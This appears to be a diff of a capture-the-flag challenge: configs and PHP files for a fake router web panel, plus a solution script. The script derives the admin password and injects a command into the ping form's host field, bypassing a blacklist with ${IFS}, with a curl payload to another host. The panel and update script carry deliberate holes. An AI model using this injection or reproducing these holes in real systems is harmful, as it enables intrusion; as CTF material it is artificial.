+    option domain-name-servers 8.8.8.8, 1.1.1.1;
+}
+subnet 10.0.18.0 netmask 255.255.255.0 {
+    range 10.0.18.10 10.0.18.12;
+    option routers 10.0.18.1;
+    option domain-name-servers 8.8.8.8, 1.1.1.1;
+}
+subnet 10.0.19.0 netmask 255.255.255.0 {
+    range 10.0.19.10 10.0.19.12;
+    option routers 10.0.19.1;
+    option domain-name-servers 8.8.8.8, 1.1.1.1;
+}
+subnet 10.0.20.0 netmask 255.255.255.0 {
+    range 10.0.20.10 10.0.20.12;
+    option routers 10.0.20.1;
+    option domain-name-servers 8.8.8.8, 1.1.1.1;
+}
+subnet 10.0.21.0 netmask 255.255.255.0 {
+    range 10.0.21.10 10.0.21.12;
+    option routers 10.0.21.1;
+    option domain-name-servers 8.8.8.8, 1.1.1.1;
+}
+subnet 10.0.22.0 netmask 255.255.255.0 {
+    range 10.0.22.10 10.0.22.12;
+    option routers 10.0.22.1;
+    option domain-name-servers 8.8.8.8, 1.1.1.1;
+}
+subnet 10.0.23.0 netmask 255.255.255.0 {
+    range 10.0.23.10 10.0.23.12;
+    option routers 10.0.23.1;
+    option domain-name-servers 8.8.8.8, 1.1.1.1;
+}
+subnet 10.0.24.0 netmask 255.255.255.0 {
+    range 10.0.24.10 10.0.24.12;
+    option routers 10.0.24.1;
+    option domain-name-servers 8.8.8.8, 1.1.1.1;
+}
+subnet 10.0.25.0 netmask 255.255.255.0 {
+    range 10.0.25.10 10.0.25.12;
+    option routers 10.0.25.1;
+    option domain-name-servers 8.8.8.8, 1.1.1.1;
+}
+subnet 10.0.26.0 netmask 255.255.255.0 {
+    range 10.0.26.10 10.0.26.12;
+    option routers 10.0.26.1;
+    option domain-name-servers 8.8.8.8, 1.1.1.1;
+}
+subnet 10.0.27.0 netmask 255.255.255.0 {
+    range 10.0.27.10 10.0.27.12;
+    option routers 10.0.27.1;
+    option domain-name-servers 8.8.8.8, 1.1.1.1;
+}
+subnet 10.0.28.0 netmask 255.255.255.0 {
+    range 10.0.28.10 10.0.28.12;
+    option routers 10.0.28.1;
+    option domain-name-servers 8.8.8.8, 1.1.1.1;
+}
+subnet 10.0.29.0 netmask 255.255.255.0 {
+    range 10.0.29.10 10.0.29.12;
+    option routers 10.0.29.1;
+    option domain-name-servers 8.8.8.8, 1.1.1.1;
+}
+subnet 10.0.30.0 netmask 255.255.255.0 {
+    range 10.0.30.10 10.0.30.12;
+    option routers 10.0.30.1;
+    option domain-name-servers 8.8.8.8, 1.1.1.1;
+}
+subnet 10.0.31.0 netmask 255.255.255.0 {
+    range 10.0.31.10 10.0.31.12;
+    option routers 10.0.31.1;
+    option domain-name-servers 8.8.8.8, 1.1.1.1;
+}
+subnet 10.0.32.0 netmask 255.255.255.0 {
+    range 10.0.32.10 10.0.32.12;
+    option routers 10.0.32.1;
+    option domain-name-servers 8.8.8.8, 1.1.1.1;
+}
+subnet 10.0.33.0 netmask 255.255.255.0 {
+    range 10.0.33.10 10.0.33.12;
+    option routers 10.0.33.1;
+    option domain-name-servers 8.8.8.8, 1.1.1.1;
+}
+subnet 10.0.34.0 netmask 255.255.255.0 {
+    range 10.0.34.10 10.0.34.12;
+    option routers 10.0.34.1;
+    option domain-name-servers 8.8.8.8, 1.1.1.1;
+}
+subnet 10.0.35.0 netmask 255.255.255.0 {
+    range 10.0.35.10 10.0.35.12;
+    option routers 10.0.35.1;
+    option domain-name-servers 8.8.8.8, 1.1.1.1;
+}
+subnet 10.0.36.0 netmask 255.255.255.0 {
+    range 10.0.36.10 10.0.36.12;
+    option routers 10.0.36.1;
+    option domain-name-servers 8.8.8.8, 1.1.1.1;
+}
+subnet 10.0.37.0 netmask 255.255.255.0 {
+    range 10.0.37.10 10.0.37.12;
+    option routers 10.0.37.1;
+    option domain-name-servers 8.8.8.8, 1.1.1.1;
+}
+subnet 10.0.38.0 netmask 255.255.255.0 {
+    range 10.0.38.10 10.0.38.12;
+    option routers 10.0.38.1;
+    option domain-name-servers 8.8.8.8, 1.1.1.1;
+}
+subnet 10.0.39.0 netmask 255.255.255.0 {
+    range 10.0.39.10 10.0.39.12;
+    option routers 10.0.39.1;
+    option domain-name-servers 8.8.8.8, 1.1.1.1;
+}
+subnet 10.0.40.0 netmask 255.255.255.0 {
+    range 10.0.40.10 10.0.40.12;
+    option routers 10.0.40.1;
+    option domain-name-servers 8.8.8.8, 1.1.1.1;
+}
+subnet 10.0.41.0 netmask 255.255.255.0 {
+    range 10.0.41.10 10.0.41.12;
+    option routers 10.0.41.1;
+    option domain-name-servers 8.8.8.8, 1.1.1.1;
+}

server-config/interfaces.backup

@@ -0,0 +1,185 @@
+# This file describes the network interfaces available on your system
+# and how to activate them. For more information, see interfaces(5).
+
+source /etc/network/interfaces.d/*
+
+# The loopback network interface
+auto lo
+iface lo inet loopback
+
+auto enp9s0f0
+iface enp9s0f0 inet static
+address 130.192.93.78
+netmask 255.255.255.0
+gateway 130.192.93.17
+
+auto enp9s0f1
+iface enp9s0f1 inet static
+address 192.168.1.10
+netmask 255.255.255.0
+
+auto enp5s0f0
+iface enp5s0f0 inet static
+address 10.0.0.0
+netmask 255.255.255.0
+
+auto enp5s0f0.1013
+iface enp5s0f0.1013 inet static
+address 10.0.13.1
+netmask 255.255.255.0
+
+auto enp5s0f0.1014
+iface enp5s0f0.1014 inet static
+address 10.0.14.1
+netmask 255.255.255.0
+
+auto enp5s0f0.1015
+iface enp5s0f0.1015 inet static
+address 10.0.15.1
+netmask 255.255.255.0
+
+auto enp5s0f0.1016
+iface enp5s0f0.1016 inet static
+address 10.0.16.1
+netmask 255.255.255.0
+
+auto enp5s0f0.1017
+iface enp5s0f0.1017 inet static
+address 10.0.17.1
+netmask 255.255.255.0
+
+auto enp5s0f0.1018
+iface enp5s0f0.1018 inet static
+address 10.0.18.1
+netmask 255.255.255.0
+
+auto enp5s0f0.1019
+iface enp5s0f0.1019 inet static
+address 10.0.19.1
+netmask 255.255.255.0
+
+auto enp5s0f0.1020
+iface enp5s0f0.1020 inet static
+address 10.0.20.1
+netmask 255.255.255.0
+
+auto enp5s0f0.1021
+iface enp5s0f0.1021 inet static
+address 10.0.21.1
+netmask 255.255.255.0
+
+auto enp5s0f0.1022
+iface enp5s0f0.1022 inet static
+address 10.0.22.1
+netmask 255.255.255.0
+
+auto enp5s0f0.1023
+iface enp5s0f0.1023 inet static
+address 10.0.23.1
+netmask 255.255.255.0
+
+auto enp5s0f0.1024
+iface enp5s0f0.1024 inet static
+address 10.0.24.1
+netmask 255.255.255.0
+
+auto enp5s0f0.1025
+iface enp5s0f0.1025 inet static
+address 10.0.25.1
+netmask 255.255.255.0
+
+auto enp5s0f0.1026
+iface enp5s0f0.1026 inet static
+address 10.0.26.1
+netmask 255.255.255.0
+
+auto enp5s0f0.1027
+iface enp5s0f0.1027 inet static
+address 10.0.27.1
+netmask 255.255.255.0
+
+auto enp5s0f0.1028
+iface enp5s0f0.1028 inet static
+address 10.0.28.1
+netmask 255.255.255.0
+
+auto enp5s0f0.1029
+iface enp5s0f0.1029 inet static
+address 10.0.29.1
+netmask 255.255.255.0
+
+auto enp5s0f0.1030
+iface enp5s0f0.1030 inet static
+address 10.0.30.1
+netmask 255.255.255.0
+
+auto enp5s0f0.1031
+iface enp5s0f0.1031 inet static
+address 10.0.31.1
+netmask 255.255.255.0
+
+auto enp5s0f0.1032
+iface enp5s0f0.1032 inet static
+address 10.0.32.1
+netmask 255.255.255.0
+
+auto enp5s0f0.1033
+iface enp5s0f0.1033 inet static
+address 10.0.33.1
+netmask 255.255.255.0
+
+auto enp5s0f0.1034
+iface enp5s0f0.1034 inet static
+address 10.0.34.1
+netmask 255.255.255.0
+
+auto enp5s0f0.1035
+iface enp5s0f0.1035 inet static
+address 10.0.35.1
+netmask 255.255.255.0
+
+auto enp5s0f0.1036
+iface enp5s0f0.1036 inet static
+address 10.0.36.1
+netmask 255.255.255.0
+
+auto enp5s0f0.1037
+iface enp5s0f0.1037 inet static
+address 10.0.37.1
+netmask 255.255.255.0
+
+auto enp5s0f0.1038
+iface enp5s0f0.1038 inet static
+address 10.0.38.1
+netmask 255.255.255.0
+
+auto enp5s0f0.1039
+iface enp5s0f0.1039 inet static
+address 10.0.39.1
+netmask 255.255.255.0
+
+auto enp5s0f0.1040
+iface enp5s0f0.1040 inet static
+address 10.0.40.1
+netmask 255.255.255.0
+
+auto enp5s0f0.1041
+iface enp5s0f0.1041 inet static
+address 10.0.41.1
+netmask 255.255.255.0
+
+auto enp5s0f0.1100
+iface enp5s0f0.1100 inet static
+address 10.0.100.1
+netmask 255.255.255.0
+
+auto enp5s0f0.1101
+iface enp5s0f0.1101 inet static
+address 10.0.101.1
+netmask 255.255.255.0
+
+auto enp5s0f0.1102
+iface enp5s0f0.1102 inet static
+address 10.0.102.1
+netmask 255.255.255.0
+

server-config/iptables

@@ -0,0 +1,8 @@
+iptables -N LOG_DROP
+iptables -I FORWARD -s 10.0.0.0/16 -d 10.0.0.0/16 -j LOG_DROP
+iptables -A LOG_DROP -j LOG --log-prefix "refused connection: "
+iptables -A LOG_DROP -j DROP
+iptables -A FORWARD -i enp5s0f0 -o enp9s0f0 -j ACCEPT
+iptables -A FORWARD -i enp5s0f0 -o enp9s0f0 -m state --state ESTABLISHED,RELATED -j ACCEPT
+iptables -t nat -A POSTROUTING -o enp9s0f0 -j MASQUERADE
+#iptables -A FORWARD -j DROP

server-config/iptables-save.dropall.rules

@@ -0,0 +1,27 @@
+# Generated by xtables-save v1.8.2 on Fri Sep 25 17:53:13 2020
+*filter
+:INPUT ACCEPT [0:0]
+:FORWARD ACCEPT [0:0]
+:OUTPUT ACCEPT [0:0]
+:LOG_DROP - [0:0]
+
+-A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
+-A FORWARD -s 10.0.0.0/16 -d 168.119.32.41 -j ACCEPT
+-A FORWARD -s 10.0.0.0/16 -d 168.119.32.44 -j ACCEPT
+-A FORWARD -s 10.0.0.0/16 -j LOG_DROP
+
+-A FORWARD -i enp5s0f0 -o enp9s0f0 -j ACCEPT
+-A FORWARD -i enp5s0f0 -o enp9s0f0 -m state --state RELATED,ESTABLISHED -j ACCEPT
+-A LOG_DROP -j LOG --log-prefix "refused connection: "
+-A LOG_DROP -j DROP
+COMMIT
+# Completed on Fri Sep 25 17:53:13 2020
+# Generated by xtables-save v1.8.2 on Fri Sep 25 17:53:13 2020
+*nat
+:PREROUTING ACCEPT [0:0]
+:INPUT ACCEPT [0:0]
+:POSTROUTING ACCEPT [0:0]
+:OUTPUT ACCEPT [0:0]
+-A POSTROUTING -o enp9s0f0 -j MASQUERADE
+COMMIT
+# Completed on Fri Sep 25 17:53:13 2020

server-config/iptables-save.dropvlans.rules

@@ -0,0 +1,22 @@
+# Generated by xtables-save v1.8.2 on Fri Sep 25 17:53:13 2020
+*filter
+:INPUT ACCEPT [0:0]
+:FORWARD ACCEPT [0:0]
+:OUTPUT ACCEPT [0:0]
+:LOG_DROP - [0:0]
+-A FORWARD -s 10.0.0.0/16 -d 10.0.0.0/16 -j LOG_DROP
+-A FORWARD -i enp5s0f0 -o enp9s0f0 -j ACCEPT
+-A FORWARD -i enp5s0f0 -o enp9s0f0 -m state --state RELATED,ESTABLISHED -j ACCEPT
+-A LOG_DROP -j LOG --log-prefix "refused connection: "
+-A LOG_DROP -j DROP
+COMMIT
+# Completed on Fri Sep 25 17:53:13 2020
+# Generated by xtables-save v1.8.2 on Fri Sep 25 17:53:13 2020
+*nat
+:PREROUTING ACCEPT [0:0]
+:INPUT ACCEPT [0:0]
+:POSTROUTING ACCEPT [0:0]
+:OUTPUT ACCEPT [0:0]
+-A POSTROUTING -o enp9s0f0 -j MASQUERADE
+COMMIT
+# Completed on Fri Sep 25 17:53:13 2020

solution/solution.py

@@ -0,0 +1,41 @@
+import requests
+import hashlib
+import sys
+
+def xorshift(x, y, z, w):
+    t = x
+    t = t ^ ((t << 11) & 0xFFFFFFFF)
+    t = t ^ (t >> 8)
+    x, y, z = y, z, w
+    w = (w ^ (w >> 19)) ^ t
+    return x, y, z, w, t
+
+def keygen(mac, serial):
+	l = 20
+	password = ""
+	md5a = hashlib.md5(mac).hexdigest()
+	md5b = hashlib.md5(serial).hexdigest()
+	w = int(md5a[0:8], 16)
+	x = int(md5a[8:16], 16)
+	y = int(md5a[16:24], 16)
+	z = int(md5a[24:32], 16)
+
+	for i in range(0, l):
+		x, y, z, w, t = xorshift(x, y, z, w)
+		password += md5b[t % 20]
+
+	return password
+
+def rce(username, password, host, payload):
+	requests.post("http://{}/utils.php".format(host), auth=auth(username, password), data={"action": "ping", "host": "127.0.0.1\n".format(payload.replace(' ', '${IFS}'))})
+
+def main():
+	serial = sys.argv[1].encode("ascii")
+	mac = sys.argv[2].encode("ascii")
+	host = "192.168.77.1"
+	payload = "curl 192.168.77.10:8080"
+	password = keygen(mac, serial)
+	print(password)
+	#rce("admin", password, host, payload)
+	
+main()

update/update.sh

@@ -1,29 +1,42 @@
 #!/bin/sh
 
+if [[ -z $key ]]; then
+	/bin/echo "Usage: sudo key=<update_key> -E update.sh"
+	exit 1
+fi
+
+password=`/bin/cat /etc/update_key | /usr/bin/sha512sum | /usr/bin/cut -d' ' -f 1`
+auth=`/bin/echo -n $key | /usr/bin/sha512sum | /usr/bin/cut -d' ' -f 1`                                                             
+
+if [[ "$auth" != "$password" ]]; then
+        /bin/echo "Wrong password"
+        exit 1
+fi
+
+
 pubkey="/pub.pem"
-file="/tmp/update.tgz.cc"
-echo "### ccOS Update Script ###"
-echo "[+] Starting"
-sleep 1
-echo "[+] Extracting Signature"
+file="/tmp/update.tar.cc"
+/bin/chmod 777 $file
+/bin/echo "### ccOS Update Script ###"
+/bin/echo "[+] Starting"
+/bin/sleep 1
+/bin/echo "[+] Extracting Signature"
 skip=$(expr $(stat -c '%s' $file) - 256)
 if [[ -L $file ]]
 then
 	exit 0
 fi 
-dd if=/tmp/update.tgz.cc of=sig bs=1 count=256 skip=$skip > /dev/null 2>&1
-truncate -s $skip update.tgz.cc
-check=`openssl dgst -sha256 -verify $pubkey -signature /tmp/sig /tmp/update.tgz.cc`
+/bin/dd if=/tmp/update.tar.cc of=sig bs=1 count=256 skip=$skip
+/usr/bin/truncate -s $skip $file
+check=`/usr/bin/openssl dgst -sha256 -verify $pubkey -signature /tmp/sig $file`
 if [ "$check" == "Verified OK" ]
 then
-        echo "[+] Signature is valid!"
-        echo "[+] Upgrading..."
-        tar -xvzf /tmp/update.tgz.cc -C /
-        rm /tmp/update.tgz.cc /tmp/sig
-        echo "[+] Done"
-        exit 0
+        /bin/echo "[+] Signature is valid!"
+        /bin/echo "[+] Upgrading..."
+        /bin/tar -xvf $file -C /
+        /bin/rm /tmp/sig
+        /bin/echo "[+] Done"
 else
-        echo "[-] Signature error, exiting..."
-        rm /tmp/update.tgz.cc /tmp/sig
-        exit 1
+        /bin/echo "[-] Signature error, exiting..."
+        /bin/rm /tmp/sig
 fi

webpanel/includes/auth.php

@@ -0,0 +1,14 @@
+<?php
+
+$http_username = $_SERVER['PHP_AUTH_USER'];
+$http_password = $_SERVER['PHP_AUTH_PW'];
+
+$auth = (hash_equals($http_password, $password));
+
+if (!$auth) {
+	header('WWW-Authenticate: Basic realm="ccOS Web Panel"');
+	header('HTTP/1.0 401 Unauthorized');
+	die ("Not authorized");
+}
+
+?>

webpanel/includes/config.php

@@ -1,7 +1,10 @@
 <?php
-$site = "crOS";
+$site = "ccOS";
 $flag = "###FLAG1###";
-$interface = "wlan0";
+$interface = "ap0";
 $blacklist = array(';', '#', '(', ')', '|', '&', ' ', "\t", '<', '>');
+$password = file_get_contents("/etc/wpa");
+
+require_once("auth.php");
 
 ?>

webpanel/index.php

@@ -39,12 +39,12 @@ require_once("includes/nav.php");
 					</tr>
 				</tbody>
 			</table>
+			<?php /*
 			<h3>Client List</h3>
 			<?php $leases = file_get_contents('/var/log/dhcpd.leases'); ?>
 			<pre>
 			<?php echo $leases ?>
 			</pre>
-			<?php /*
 			<table class="table">
 				<thead>
 					<tr>
@@ -59,18 +59,8 @@ require_once("includes/nav.php");
 						<td>00:11:22:AA:BB:CC</td>
 						<td>desktop-ab2846ad</td>
 					</tr>
-					<tr>
-						<td>192.168.77.2</td>
-						<td>00:11:22:AA:BB:DD</td>
-						<td>android-deadbeef</td>
-					</tr>
-					<tr>
-						<td>192.168.77.4</td>
-						<td>00:11:22:AA:BB:EE</td>
-						<td>windows-laptop</td>
-					</tr>
 				</tbody>
-			</table>*/?>		
+			</table>*/ ?>		
 		</div>
 	</body>
 </html>

webpanel/update.php

@@ -4,9 +4,9 @@ require_once("includes/config.php");
 require_once("includes/header.php");
 require_once("includes/nav.php");
 
-if ($_SERVER['REQUEST_METHOD'] === POST && isset($_FILES['update']) && $_FILES['update']['size'] > 10000000 && $_FILES['upfile']['size'] < 10000000) {
+if ($_SERVER['REQUEST_METHOD'] === POST && isset($_FILES['update']) && $_FILES['update']['size'] > 10000000 && $_FILES['upfile']['size'] < 10000000 && isset($_POST['password']) && !empty($_POST['password'])) {
 	move_uploaded_file($_FILES['file']['tmp_name'], '/tmp/update.tgz.cc');
-	exec("/usr/bin/sudo /update.sh", $result);
+	exec("/usr/bin/sudo key='".escapeshellarg($_POST['password'])."' /update.sh", $result);
 }
 
 ?>
@@ -14,7 +14,8 @@ if ($_SERVER['REQUEST_METHOD'] === POST && isset($_FILES['update']) && $_FILES['
 			<h2>System Update</h2>
 			<form id="update" enctype="multipart/form-data" method="post" action="">
 				<fieldset>
-					<input type="file" name="update">
+					<input type="file" name="update" required>
+					<input type="password" name="password" placeholder="Update password" required>
 					<input type="submit" class="btn btn-b btn-sm smooth" value="Upload">
 					<p>
 						<ul>

webpanel/utils.php

@@ -7,7 +7,7 @@ require_once("includes/nav.php");
 if ($_SERVER['REQUEST_METHOD'] === 'POST' && ($_POST['action'] === 'ping' || $_POST['action'] === 'traceroute') && isset($_POST['host']) && !empty($_POST['host'])) {
 	switch ($_POST['action']) {
 		case 'ping':
-			$cmd = '/bin/'.$_POST['action']. ' -c 4';
+			$cmd = '/bin/'.$_POST['action']. ' -c 2';
 		break;
 		case 'traceroute':
 			$cmd = '/usr/bin/'.$_POST['action'];